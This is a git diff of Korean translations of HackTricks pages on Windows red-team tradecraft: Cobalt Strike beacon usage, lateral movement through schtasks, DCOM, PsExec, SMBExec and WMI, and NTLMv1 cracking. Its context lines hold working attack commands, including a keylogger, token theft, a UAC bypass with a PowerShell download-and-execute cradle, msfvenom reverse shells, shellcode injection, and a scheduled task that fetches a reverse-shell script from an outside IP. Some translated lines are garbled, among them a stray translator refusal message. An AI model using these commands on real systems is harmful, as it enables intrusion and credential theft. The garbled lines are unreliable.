+- [ ] 파일 및 레지스트리에서 [**일반 비밀번호 검색**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry)
 - [ ] 비밀번호를 자동으로 검색하는 [**도구**](windows-local-privilege-escalation/#tools-that-search-for-passwords)
 
 ### [유출된 핸들러](windows-local-privilege-escalation/#leaked-handlers)
 
 - [ ] 관리자에 의해 실행된 프로세스의 핸들러에 접근할 수 있나요?
 
-### [파이프 클라이언트 가장](windows-local-privilege-escalation/#named-pipe-client-impersonation)
+### [파이프 클라이언트 가장하기](windows-local-privilege-escalation/#named-pipe-client-impersonation)
 
 - [ ] 이를 악용할 수 있는지 확인하세요.
 
diff --git a/src/windows-hardening/cobalt-strike.md b/src/windows-hardening/cobalt-strike.md
index b17410794..309ab1b4f 100644
--- a/src/windows-hardening/cobalt-strike.md
+++ b/src/windows-hardening/cobalt-strike.md
@@ -4,16 +4,16 @@
 
 ### C2 Listeners
 
-`Cobalt Strike -> Listeners -> Add/Edit` 그러면 어디에서 수신할지, 어떤 종류의 비콘을 사용할지 (http, dns, smb...) 등을 선택할 수 있습니다.
+`Cobalt Strike -> Listeners -> Add/Edit` 그런 다음 수신 대기할 위치와 사용할 비콘 종류(http, dns, smb...) 등을 선택할 수 있습니다.
 
 ### Peer2Peer Listeners
 
 이 리스너의 비콘은 C2와 직접 통신할 필요가 없으며, 다른 비콘을 통해 통신할 수 있습니다.
 
-`Cobalt Strike -> Listeners -> Add/Edit` 그러면 TCP 또는 SMB 비콘을 선택해야 합니다.
+`Cobalt Strike -> Listeners -> Add/Edit` 그런 다음 TCP 또는 SMB 비콘을 선택해야 합니다.
 
-* **TCP 비콘은 선택한 포트에 리스너를 설정합니다**. TCP 비콘에 연결하려면 다른 비콘에서 `connect <ip> <port>` 명령을 사용하세요.
-* **smb 비콘은 선택한 이름의 파이프 이름에서 수신합니다**. SMB 비콘에 연결하려면 `link [target] [pipe]` 명령을 사용해야 합니다.
+* **TCP 비콘은 선택한 포트에서 리스너를 설정합니다**. TCP 비콘에 연결하려면 다른 비콘에서 `connect <ip> <port>` 명령을 사용하십시오.
+* **smb 비콘은 선택한 이름의 파이프 이름에서 수신 대기합니다**. SMB 비콘에 연결하려면 `link [target] [pipe]` 명령을 사용해야 합니다.
 
 ### Generate & Host payloads
 
@@ -28,11 +28,11 @@
 
 #### Generate & Host payloads
 
-`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` 이는 비콘을 cobalt strike에서 다운로드하기 위한 스크립트/실행 파일을 생성합니다. 형식은 bitsadmin, exe, powershell 및 python입니다.
+`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` 이는 비콘을 cobalt strike에서 다운로드하기 위한 스크립트/실행 파일을 생성합니다. 형식에는 bitsadmin, exe, powershell 및 python이 포함됩니다.
 
 #### Host Payloads
 
-호스팅할 파일이 이미 웹 서버에 있다면 `Attacks -> Web Drive-by -> Host File`로 가서 호스팅할 파일과 웹 서버 구성을 선택하세요.
+호스팅할 파일이 이미 웹 서버에 있는 경우 `Attacks -> Web Drive-by -> Host File`로 이동하여 호스팅할 파일과 웹 서버 구성을 선택하십시오.
 
 ### Beacon Options
 
@@ -40,14 +40,14 @@
 execute-assembly &#x3C;/path/to/executable.exe>
 
 # Screenshots
-printscreen    # PrintScr 방법으로 단일 스크린샷 찍기
+printscreen    # PrintScr 방법을 통해 단일 스크린샷 찍기
 screenshot     # 단일 스크린샷 찍기
 screenwatch    # 데스크탑의 주기적인 스크린샷 찍기
-## 보기 -> 스크린샷으로 가서 확인하세요
+## 보기 -> 스크린샷으로 이동하여 확인
 
 # keylogger
 keylogger [pid] [x86|x64]
-## 보기 > 키 입력으로 가서 눌린 키를 확인하세요
+## 보기 > 키스트로크에서 눌린 키 확인
 
 # portscan
 portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # 다른 프로세스 내에서 포트 스캔 작업 주입
@@ -56,14 +56,14 @@ portscan [targets] [ports] [arp|icmp|none] [max connections]
 # Powershell
 # Powershell 모듈 가져오기
 powershell-import C:\path\to\PowerView.ps1
-powershell &#x3C;여기에 powershell cmd를 작성하세요>
+powershell &#x3C;여기에 powershell cmd 작성>
 
 # User impersonation
 ## 자격 증명으로 토큰 생성
 make_token [DOMAIN\user] [password] # 네트워크에서 사용자를 가장하기 위한 토큰 생성
 ls \\computer_name\c$ # 생성된 토큰을 사용하여 C$에 접근 시도
 rev2self # make_token으로 생성된 토큰 사용 중지
-## make_token 사용 시 이벤트 4624가 생성됩니다: 계정이 성공적으로 로그인되었습니다. 이 이벤트는 Windows 도메인에서 매우 일반적이지만, 로그온 유형으로 필터링하여 좁힐 수 있습니다. 위에서 언급했듯이, 이는 LOGON32_LOGON_NEW_CREDENTIALS를 사용하며, 이는 유형 9입니다.
+## make_token 사용 시 이벤트 4624가 생성됩니다: 계정이 성공적으로 로그인되었습니다. 이 이벤트는 Windows 도메인에서 매우 일반적이지만 로그온 유형으로 필터링하여 좁힐 수 있습니다. 위에서 언급했듯이, 이는 LOGON32_LOGON_NEW_CREDENTIALS를 사용하며, 이는 유형 9입니다.
 
 # UAC Bypass
 elevate svc-exe &#x3C;listener>
@@ -73,17 +73,17 @@ runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.w
 ## pid에서 토큰 훔치기
 ## make_token과 유사하지만 프로세스에서 토큰을 훔칩니다
 steal_token [pid] # 또한, 이는 네트워크 작업에 유용하며, 로컬 작업에는 유용하지 않습니다.
-## API 문서에서 이 로그온 유형은 "호출자가 현재 토큰을 복제할 수 있도록 허용합니다"라고 알려줍니다. 그래서 비콘 출력에서 Impersonated &#x3C;current_username>라고 표시됩니다 - 이는 우리의 복제된 토큰을 가장하고 있습니다.
+## API 문서에서 이 로그온 유형은 "호출자가 현재 토큰을 복제할 수 있도록 허용합니다"라고 알려줍니다. 그래서 비콘 출력에서 Impersonated &#x3C;current_username>라고 표시되는 것입니다 - 이는 우리의 복제된 토큰을 가장하고 있습니다.
 ls \\computer_name\c$ # 생성된 토큰을 사용하여 C$에 접근 시도
 rev2self # steal_token에서 토큰 사용 중지
 
 ## 새로운 자격 증명으로 프로세스 시작
 spawnas [domain\username] [password] [listener] # 읽기 권한이 있는 디렉토리에서 수행: cd C:\
-## make_token과 마찬가지로, 이는 Windows 이벤트 4624를 생성합니다: 계정이 성공적으로 로그인되었습니다. 그러나 로그온 유형은 2 (LOGON32_LOGON_INTERACTIVE)입니다. 호출 사용자 (TargetUserName)와 가장된 사용자 (TargetOutboundUserName)가 상세히 설명됩니다.
+## make_token과 마찬가지로, 이는 Windows 이벤트 4624를 생성합니다: 계정이 성공적으로 로그인되었습니다. 그러나 로그온 유형은 2(LOGON32_LOGON_INTERACTIVE)입니다. 호출 사용자(TargetUserName)와 가장된 사용자(TargetOutboundUserName)가 상세히 설명됩니다.
 
 ## 프로세스에 주입
 inject [pid] [x64|x86] [listener]
-## OpSec 관점에서: 정말 필요하지 않는 한 크로스 플랫폼 주입을 수행하지 마세요 (예: x86 -> x64 또는 x64 -> x86).
+## OpSec 관점에서: 정말 필요하지 않는 한 크로스 플랫폼 주입을 수행하지 마십시오 (예: x86 -> x64 또는 x64 -> x86).
 
 ## 해시 전달
 ## 이 수정 프로세스는 LSASS 메모리 패칭을 요구하며, 이는 고위험 작업으로 로컬 관리자 권한이 필요하고 Protected Process Light (PPL)가 활성화된 경우에는 실행 가능성이 낮습니다.
@@ -100,7 +100,7 @@ steal_token &#x3C;pid> # mimikatz에 의해 생성된 프로세스에서 토큰
 execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;username> /domain:&#x3C;domain> /aes256:&#x3C;aes_keys> /nowrap /opsec
 ## 새로운 티켓을 사용하기 위해 새로운 로그온 세션 생성 (손상된 세션을 덮어쓰지 않기 위해)
 make_token &#x3C;domain>\&#x3C;username> DummyPass
-## 공격자 머신에서 PowerShell 세션을 통해 티켓을 작성하고 로드합니다
+## 공격자 머신에서 파워셸 세션을 통해 티켓을 작성하고 로드합니다
 [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
 kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
 
@@ -113,9 +113,9 @@ steal_token &#x3C;pid>
 ## 티켓 추출 + 티켓 전달
 ### 티켓 목록
 execute-assembly C:\path\Rubeus.exe triage
-### LUID로 흥미로운 티켓 덤프
+### luid로 흥미로운 티켓 덤프
 execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:&#x3C;luid> /nowrap
-### 새로운 로그온 세션 생성, LUID 및 프로세스 ID 기록
+### 새로운 로그온 세션 생성, luid 및 processid 기록
 execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
 ### 생성된 로그온 세션에 티켓 삽입
 execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
@@ -128,44 +128,44 @@ jump [method] [target] [listener]
 ## 방법:
 ## psexec                    x86   서비스 EXE 아티팩트를 실행하기 위해 서비스 사용
 ## psexec64                  x64   서비스 EXE 아티팩트를 실행하기 위해 서비스 사용
-## psexec_psh                x86   PowerShell 원라이너를 실행하기 위해 서비스 사용
+## psexec_psh                x86   서비스에서 PowerShell 원라이너 실행
 ## winrm                     x86   WinRM을 통해 PowerShell 스크립트 실행
 ## winrm64                   x64   WinRM을 통해 PowerShell 스크립트 실행
 
 remote-exec [method] [target] [command]
 ## 방법:
 <strong>## psexec                          서비스 제어 관리자 통해 원격 실행
-</strong>## winrm                           WinRM (PowerShell)을 통해 원격 실행
+</strong>## winrm                           WinRM을 통해 원격 실행 (PowerShell)
 ## wmi                             WMI를 통해 원격 실행
 
-## wmi로 비콘을 실행하려면 (점프 명령에 포함되지 않음) 비콘을 업로드하고 실행하세요
+## wmi로 비콘을 실행하려면 (jump 명령에 포함되지 않음) 비콘을 업로드하고 실행하십시오
 beacon> upload C:\Payloads\beacon-smb.exe
 beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
 
 
 # Pass session to Metasploit - Through listener
-## 메타스플로잇 호스트에서
+## 메타플로잇 호스트에서
 msf6 > use exploit/multi/handler
 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
 msf6 exploit(multi/handler) > set LHOST eth0
 msf6 exploit(multi/handler) > set LPORT 8080
 msf6 exploit(multi/handler) > exploit -j
 
-## cobalt에서: Listeners > Add를 클릭하고 Payload를 Foreign HTTP로 설정합니다. Host를 10.10.5.120, Port를 8080으로 설정하고 저장을 클릭합니다.
+## cobalt에서: Listeners > Add 및 Payload를 Foreign HTTP로 설정합니다. Host를 10.10.5.120으로, Port를 8080으로 설정하고 저장을 클릭합니다.
 beacon> spawn metasploit
 ## 외부 리스너로 x86 Meterpreter 세션만 생성할 수 있습니다.
 
 # Pass session to Metasploit - Through shellcode injection
-## 메타스플로잇 호스트에서
+## 메타플로잇 호스트에서
 msfvenom -p windows/x64/meterpreter_reverse_http LHOST=&#x3C;IP> LPORT=&#x3C;PORT> -f raw -o /tmp/msf.bin
 ## msfvenom을 실행하고 multi/handler 리스너를 준비합니다.
 
-## bin 파일을 cobalt strike 호스트로 복사합니다.
+## bin 파일을 cobalt strike 호스트로 복사합니다
 ps
-shinject &#x3C;pid> x64 C:\Payloads\msf.bin # x64 프로세스에 메타스플로잇 셸코드를 주입합니다.
+shinject &#x3C;pid> x64 C:\Payloads\msf.bin # x64 프로세스에 메타스플로잇 셸코드 주입
 
 # Pass metasploit session to cobalt strike
-## 스테이지리스 비콘 셸코드를 생성합니다. Attacks > Packages > Windows Executable (S)로 가서 원하는 리스너를 선택하고 출력 유형으로 Raw를 선택한 후 x64 페이로드를 선택합니다.
+## 스테이지리스 비콘 셸코드를 생성합니다. Attacks > Packages > Windows Executable (S)로 이동하여 원하는 리스너를 선택하고 출력 유형으로 Raw를 선택한 후 x64 페이로드를 사용합니다.
 ## 메타스플로잇에서 post/windows/manage/shellcode_inject를 사용하여 생성된 cobalt strike 셸코드를 주입합니다.
 
 
@@ -180,17 +180,17 @@ beacon> ssh 10.10.17.12:22 username password</code></pre>
 
 ### Artifact Kit
 
-보통 `/opt/cobaltstrike/artifact-kit`에서 cobalt strike가 이진 비콘을 생성하는 데 사용할 코드와 미리 컴파일된 템플릿을 찾을 수 있습니다 ( `/src-common`에 있음).
+일반적으로 `/opt/cobaltstrike/artifact-kit`에서 cobalt strike가 이진 비콘을 생성하는 데 사용할 코드와 미리 컴파일된 템플릿( `/src-common`에 있음)을 찾을 수 있습니다.
 
-[ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)를 생성된 백도어(또는 컴파일된 템플릿)와 함께 사용하면 Defender가 트리거되는 원인을 찾을 수 있습니다. 보통 문자열입니다. 따라서 최종 이진 파일에 해당 문자열이 나타나지 않도록 백도어를 생성하는 코드를 수정하면 됩니다.
+생성된 백도어(또는 컴파일된 템플릿)와 함께 [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)를 사용하면 Defender가 트리거되는 원인을 찾을 수 있습니다. 일반적으로 문자열입니다. 따라서 최종 이진 파일에 해당 문자열이 나타나지 않도록 백도어를 생성하는 코드를 수정할 수 있습니다.
 
-코드를 수정한 후 동일한 디렉토리에서 `./build.sh`를 실행하고 `dist-pipe/` 폴더를 Windows 클라이언트의 `C:\Tools\cobaltstrike\ArtifactKit`로 복사하세요.
+코드를 수정한 후 동일한 디렉토리에서 `./build.sh`를 실행하고 `dist-pipe/` 폴더를 Windows 클라이언트의 `C:\Tools\cobaltstrike\ArtifactKit`로 복사하십시오.
 ```
 pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
 ```
-공격적인 스크립트 `dist-pipe\artifact.cna`를 로드하는 것을 잊지 마세요. 이는 Cobalt Strike가 우리가 원하는 디스크의 리소스를 사용하도록 지시합니다.
+`dist-pipe\artifact.cna`의 공격적인 스크립트를 로드하는 것을 잊지 마세요. 이는 Cobalt Strike가 우리가 원하는 디스크의 리소스를 사용하도록 지시합니다.
 
-### 리소스 키트
+### Resource Kit
 
 ResourceKit 폴더에는 PowerShell, VBA 및 HTA를 포함한 Cobalt Strike의 스크립트 기반 페이로드 템플릿이 포함되어 있습니다.
 
diff --git a/src/windows-hardening/lateral-movement/atexec.md b/src/windows-hardening/lateral-movement/atexec.md
index baf89a5e1..32fb5d664 100644
--- a/src/windows-hardening/lateral-movement/atexec.md
+++ b/src/windows-hardening/lateral-movement/atexec.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## 작동 방식
+## How Does it works
 
 At는 사용자 이름/(비밀번호/해시)를 알고 있는 호스트에서 작업을 예약할 수 있습니다. 따라서 이를 사용하여 다른 호스트에서 명령을 실행하고 출력을 얻을 수 있습니다.
 ```
@@ -18,7 +18,7 @@ schtasks /run /tn <TASK_NAME> /S <VICTIM>
 schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
 schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
 ```
-당신은 또한 [SharpLateral](https://github.com/mertdas/SharpLateral)을 사용할 수 있습니다:
+또한 [SharpLateral](https://github.com/mertdas/SharpLateral)을 사용할 수 있습니다:
 ```bash
 SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
 ```
diff --git a/src/windows-hardening/lateral-movement/dcom-exec.md b/src/windows-hardening/lateral-movement/dcom-exec.md
index 8d1b0f6c2..239b4f447 100644
--- a/src/windows-hardening/lateral-movement/dcom-exec.md
+++ b/src/windows-hardening/lateral-movement/dcom-exec.md
@@ -36,7 +36,7 @@ ls \\10.10.10.10\c$\Users
 
 **이 기술에 대한 자세한 정보는 원본 게시물을 확인하세요 [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)**
 
-**MMC20.Application** 객체는 명시적인 "LaunchPermissions"가 부족하여 기본적으로 관리자가 접근할 수 있는 권한으로 설정되어 있음을 확인했습니다. 추가 세부정보는 [여기](https://twitter.com/tiraniddo/status/817532039771525120)에서 확인할 수 있으며, 명시적인 Launch Permission이 없는 객체를 필터링하기 위해 [@tiraniddo](https://twitter.com/tiraniddo)의 OleView .NET 사용을 권장합니다.
+**MMC20.Application** 객체는 명시적인 "LaunchPermissions"가 부족하여 기본적으로 관리자가 접근할 수 있는 권한으로 설정되어 있습니다. 추가 세부정보는 [여기](https://twitter.com/tiraniddo/status/817532039771525120)에서 확인할 수 있으며, 명시적인 Launch Permission이 없는 객체를 필터링하기 위해 [@tiraniddo](https://twitter.com/tiraniddo)의 OleView .NET 사용이 권장됩니다.
 
 명시적인 Launch Permissions가 부족한 두 개의 특정 객체인 `ShellBrowserWindow`와 `ShellWindows`가 강조되었습니다. `HKCR:\AppID\{guid}` 아래에 `LaunchPermission` 레지스트리 항목이 없다는 것은 명시적인 권한이 없음을 의미합니다.
 
@@ -44,7 +44,7 @@ ls \\10.10.10.10\c$\Users
 
 ProgID가 없는 `ShellWindows`의 경우, .NET 메서드 `Type.GetTypeFromCLSID`와 `Activator.CreateInstance`를 사용하여 AppID를 통해 객체 인스턴스를 생성할 수 있습니다. 이 과정은 OleView .NET을 활용하여 `ShellWindows`의 CLSID를 검색합니다. 인스턴스화된 후에는 `WindowsShell.Item` 메서드를 통해 상호작용이 가능하며, `Document.Application.ShellExecute`와 같은 메서드 호출로 이어집니다.
 
-객체를 인스턴스화하고 원격으로 명령을 실행하기 위한 PowerShell 명령 예제가 제공되었습니다:
+객체를 인스턴스화하고 원격으로 명령을 실행하기 위한 PowerShell 명령의 예가 제공되었습니다:
 ```powershell
 $com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
 $obj = [System.Activator]::CreateInstance($com)
@@ -53,7 +53,7 @@ $item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\sy
 ```
 ### Lateral Movement with Excel DCOM Objects
 
-측면 이동은 DCOM Excel 객체를 악용하여 달성할 수 있습니다. 자세한 정보는 [Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom)에서 DCOM을 통한 측면 이동을 위한 Excel DDE 활용에 대한 논의를 읽는 것이 좋습니다.
+측면 이동은 DCOM Excel 객체를 이용하여 수행할 수 있습니다. 자세한 정보는 [Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom)에서 DCOM을 통한 측면 이동을 위한 Excel DDE 활용에 대한 논의를 읽는 것이 좋습니다.
 
 Empire 프로젝트는 DCOM 객체를 조작하여 원격 코드 실행(RCE)을 위해 Excel을 활용하는 PowerShell 스크립트를 제공합니다. 아래는 [Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1)에서 제공되는 스크립트의 일부로, RCE를 위해 Excel을 악용하는 다양한 방법을 보여줍니다:
 ```powershell
@@ -95,7 +95,7 @@ SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
 ```bash
 SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
 ```
-## 참고 문헌
+## 참고문헌
 
 - [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)
 - [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)
diff --git a/src/windows-hardening/lateral-movement/psexec-and-winexec.md b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
index 52a6467b4..709e6bd56 100644
--- a/src/windows-hardening/lateral-movement/psexec-and-winexec.md
+++ b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
@@ -17,7 +17,7 @@ msfvenom으로 생성되고 Veil을 사용하여 안티바이러스 탐지를 
 
 - **바이너리 복사**: 실행 파일은 명령 프롬프트에서 ADMIN$ 공유로 복사되지만, 파일 시스템의 어디에나 배치되어 숨겨질 수 있습니다.
 - **서비스 생성**: Windows `sc` 명령을 사용하여 원격으로 Windows 서비스를 쿼리, 생성 및 삭제할 수 있으며, 업로드된 바이너리를 가리키는 "meterpreter"라는 이름의 서비스가 생성됩니다.
-- **서비스 시작**: 마지막 단계는 서비스를 시작하는 것으로, 이는 바이너리가 진정한 서비스 바이너리가 아니기 때문에 예상 응답 코드를 반환하지 못해 "시간 초과" 오류가 발생할 가능성이 높습니다. 이 오류는 바이너리 실행이 주요 목표이므로 중요하지 않습니다.
+- **서비스 시작**: 마지막 단계는 서비스를 시작하는 것으로, 바이너리가 진정한 서비스 바이너리가 아니기 때문에 예상 응답 코드를 반환하지 않아 "시간 초과" 오류가 발생할 가능성이 높습니다. 이 오류는 바이너리 실행이 주요 목표이므로 중요하지 않습니다.
 
 Metasploit 리스너를 관찰하면 세션이 성공적으로 시작되었음을 알 수 있습니다.
 
diff --git a/src/windows-hardening/lateral-movement/smbexec.md b/src/windows-hardening/lateral-movement/smbexec.md
index 2cf26c0c6..965affcb5 100644
--- a/src/windows-hardening/lateral-movement/smbexec.md
+++ b/src/windows-hardening/lateral-movement/smbexec.md
@@ -14,9 +14,9 @@
 ```bash
 smbexec.py WORKGROUP/genericuser:genericpassword@10.10.10.10
 ```
-### 이진 파일 없이 명령 실행
+### 이진 파일 없이 명령 실행하기
 
-- **Smbexec**는 서비스 binPaths를 통해 직접 명령 실행을 가능하게 하여 대상에 물리적 이진 파일이 필요 없게 합니다.
+- **Smbexec**는 서비스 binPaths를 통해 직접 명령을 실행할 수 있게 하여, 대상에 물리적 이진 파일이 필요 없도록 합니다.
 - 이 방법은 Windows 대상에서 일회성 명령을 실행하는 데 유용합니다. 예를 들어, Metasploit의 `web_delivery` 모듈과 결합하면 PowerShell을 대상으로 하는 역 Meterpreter 페이로드를 실행할 수 있습니다.
 - cmd.exe를 통해 제공된 명령을 실행하도록 binPath가 설정된 원격 서비스를 공격자의 머신에서 생성함으로써, 서비스 응답 오류가 발생하더라도 페이로드를 성공적으로 실행하고 Metasploit 리스너와의 콜백 및 페이로드 실행을 달성할 수 있습니다.
 
diff --git a/src/windows-hardening/lateral-movement/wmiexec.md b/src/windows-hardening/lateral-movement/wmiexec.md
index 5ccea9670..96b752a47 100644
--- a/src/windows-hardening/lateral-movement/wmiexec.md
+++ b/src/windows-hardening/lateral-movement/wmiexec.md
@@ -85,13 +85,13 @@ wmic useraccount list /format:list
 wmic group list /format:list
 wmic sysaccount list /format:list
 ```
-원격에서 WMI를 통해 특정 정보(예: 로컬 관리자 또는 로그인한 사용자)를 쿼리하는 것은 신중한 명령 구성으로 가능합니다.
+원격에서 WMI를 통해 특정 정보를 쿼리하는 것은, 예를 들어 로컬 관리자나 로그인한 사용자와 같은 정보는 신중한 명령 구성으로 가능하다.
 
 ### **수동 원격 WMI 쿼리**
 
-원격 머신에서 로컬 관리자를 은밀하게 식별하고 로그인한 사용자를 확인하는 것은 특정 WMI 쿼리를 통해 달성할 수 있습니다. `wmic`는 여러 노드에서 동시에 명령을 실행하기 위해 텍스트 파일에서 읽는 것도 지원합니다.
+원격 머신에서 로컬 관리자와 로그인한 사용자를 은밀하게 식별하는 것은 특정 WMI 쿼리를 통해 달성할 수 있다. `wmic`는 또한 여러 노드에서 동시에 명령을 실행하기 위해 텍스트 파일에서 읽는 것을 지원한다.
 
-WMI를 통해 프로세스를 원격으로 실행하기 위해, 예를 들어 Empire 에이전트를 배포하는 경우, 다음과 같은 명령 구조가 사용되며, 성공적인 실행은 "0"의 반환 값으로 표시됩니다:
+WMI를 통해 프로세스를 원격으로 실행하기 위해, 예를 들어 Empire 에이전트를 배포하는 경우, 다음과 같은 명령 구조가 사용되며, 성공적인 실행은 "0"의 반환 값으로 표시된다:
 ```bash
 wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
 ```
diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md
index 785836f24..448b93788 100644
--- a/src/windows-hardening/ntlm/README.md
+++ b/src/windows-hardening/ntlm/README.md
@@ -53,7 +53,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t RE
 5. **서버**가 **도메인 이름, 사용자 이름, 도전 과제 및 응답**을 **도메인 컨트롤러**에 보냅니다. Active Directory가 구성되어 있지 않거나 도메인 이름이 서버의 이름인 경우, 자격 증명은 **로컬에서 확인**됩니다.
 6. **도메인 컨트롤러**가 모든 것이 올바른지 확인하고 정보를 서버에 보냅니다.
 
-**서버**와 **도메인 컨트롤러**는 **Netlogon** 서버를 통해 **보안 채널**을 생성할 수 있으며, 도메인 컨트롤러는 서버의 비밀번호를 알고 있습니다(비밀번호는 **NTDS.DIT** 데이터베이스에 있습니다).
+**서버**와 **도메인 컨트롤러**는 **Netlogon** 서버를 통해 **보안 채널**을 생성할 수 있으며, 도메인 컨트롤러는 서버의 비밀번호를 알고 있습니다(서버의 비밀번호는 **NTDS.DIT** 데이터베이스에 있습니다).
 
 ### 로컬 NTLM 인증 방식
 
@@ -77,15 +77,15 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t RE
 
 현재는 제약 없는 위임이 구성된 환경을 찾는 것이 덜 일반적이지만, 이는 **프린트 스풀러 서비스**를 **악용**할 수 없다는 의미는 아닙니다.
 
-AD에서 이미 가지고 있는 자격 증명/세션을 악용하여 **프린터에 인증 요청**을 할 수 있습니다. 그런 다음 `metasploit auxiliary/server/capture/smb` 또는 `responder`를 사용하여 **인증 도전 과제를 1122334455667788**로 설정하고 인증 시도를 캡처할 수 있으며, **NTLMv1**을 사용하여 수행된 경우 **해독**할 수 있습니다.\
+AD에서 이미 가지고 있는 자격 증명/세션을 악용하여 **프린터가 당신의 제어 하에 있는** 일부 **호스트에 대해 인증하도록 요청**할 수 있습니다. 그런 다음, `metasploit auxiliary/server/capture/smb` 또는 `responder`를 사용하여 **인증 도전 과제를 1122334455667788**로 설정하고 인증 시도를 캡처할 수 있으며, **NTLMv1**을 사용하여 수행된 경우 **해독**할 수 있습니다.\
 `responder`를 사용하는 경우 **인증을 다운그레이드**하기 위해 `--lm` 플래그를 **사용해 볼 수 있습니다**.\
 &#xNAN;_이 기술을 위해서는 인증이 NTLMv1을 사용하여 수행되어야 합니다 (NTLMv2는 유효하지 않음)._
 
 프린터는 인증 중에 컴퓨터 계정을 사용하며, 컴퓨터 계정은 **길고 무작위 비밀번호**를 사용하므로 **일반 사전**을 사용하여 해독할 수 없을 것입니다. 그러나 **NTLMv1** 인증은 **DES**를 사용하므로 ([자세한 정보는 여기](./#ntlmv1-challenge)), DES 해독에 특별히 전념하는 일부 서비스를 사용하면 해독할 수 있습니다 (예: [https://crack.sh/](https://crack.sh) 또는 [https://ntlmv1.com/](https://ntlmv1.com) 사용).
 
-### 해시캣을 이용한 NTLMv1 공격
+### hashcat을 이용한 NTLMv1 공격
 
-NTLMv1은 해시캣으로 해독할 수 있는 방법으로 NTLMv1 메시지를 포맷하는 NTLMv1 멀티 툴 [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi)로도 해독할 수 있습니다.
+NTLMv1은 NTLMv1 멀티 툴 [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi)로도 해독할 수 있으며, 이는 NTLMv1 메시지를 hashcat으로 해독할 수 있는 방법으로 포맷합니다.
 
 명령
 ```bash
@@ -122,7 +122,7 @@ NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
 727B4E35F947129E:1122334455667788
 A52B9CDEDAE86934:1122334455667788
 ```
-해시캣을 실행하세요(분산은 hashtopolis와 같은 도구를 통해 하는 것이 가장 좋습니다). 그렇지 않으면 며칠이 걸릴 것입니다.
+해시캣을 실행하세요(분산 방식은 hashtopolis와 같은 도구를 통해 하는 것이 가장 좋습니다). 그렇지 않으면 며칠이 걸릴 것입니다.
 ```bash
 ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
 ```
@@ -143,7 +143,7 @@ b4b9b02e6f09a9 # this is part 1
 ./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
 bd760f388b6700 # this is part 2
 ```
-죄송하지만, 요청하신 내용을 제공할 수 없습니다.
+죄송하지만, 번역할 내용이 제공되지 않았습니다. 번역할 텍스트를 제공해 주시면 도와드리겠습니다.
 ```bash
 ./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
 
@@ -157,7 +157,7 @@ NTHASH=b4b9b02e6f09a9bd760f388b6700586c
 
 **챌린지 길이는 8 바이트**이며 **2개의 응답이 전송됩니다**: 하나는 **24 바이트** 길이이고 **다른 하나**는 **가변적**입니다.
 
-**첫 번째 응답**은 **클라이언트와 도메인**으로 구성된 **문자열**을 **HMAC_MD5**로 암호화하여 생성되며, **키**로는 **NT 해시**의 **MD4 해시**를 사용합니다. 그런 다음, **결과**는 **챌린지**를 암호화하기 위해 **HMAC_MD5**를 사용하는 **키**로 사용됩니다. 여기에 **8 바이트의 클라이언트 챌린지가 추가됩니다**. 총: 24 B.
